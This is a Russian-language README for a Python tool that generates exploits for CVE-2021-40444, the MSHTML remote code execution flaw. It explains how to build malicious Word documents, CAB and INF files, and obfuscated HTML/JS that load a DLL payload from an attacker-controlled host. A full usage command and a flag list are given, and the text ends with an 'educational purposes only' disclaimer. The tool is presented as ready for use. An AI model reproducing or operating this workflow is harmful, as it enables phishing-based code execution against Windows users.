
Генератор эксплойтов на Python для CVE-2021-40444 (MSHTML RCE) с доставкой полезной нагрузки на основе шаблонов через вредоносные документы Office, архивы CAB и обфусцированные обратные вызовы HTML/JS.
Убедитесь, что сначала запустили setup.sh, так как вам понадобятся несколько директорий. После запуска скрипта вы сможете запустить gen.py с приведённым примером:
# Использование
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3
# Флаги
-d -> Наш файл .docx, уже изменённый с помощью Bitmap Object (в заголовке, документе или нижнем колонтитуле)
-i -> IP-адрес
-p -> Полезная нагрузка (.dll)
-t -> HTML-файл с JavaScript
-r -> Переименовать вывод изменённого .docx
-c -> Переименовать вывод исправленного .cab
-f -> Переименовать вывод .inf
-obf -> Дополнительно: 3 режима (HTML Entity, UTF-16BE или оба)
-v -> Увеличить подробность вывода
http.server будет в директории . В этой директории будут 3 файла:web

Этот репозиторий предназначен только для образовательных целей и не предназначен для использования в реальных условиях с плохими намерениями. Любое незаконное использование этого репозитория осуществляется строго на ваш собственный риск и ответственность.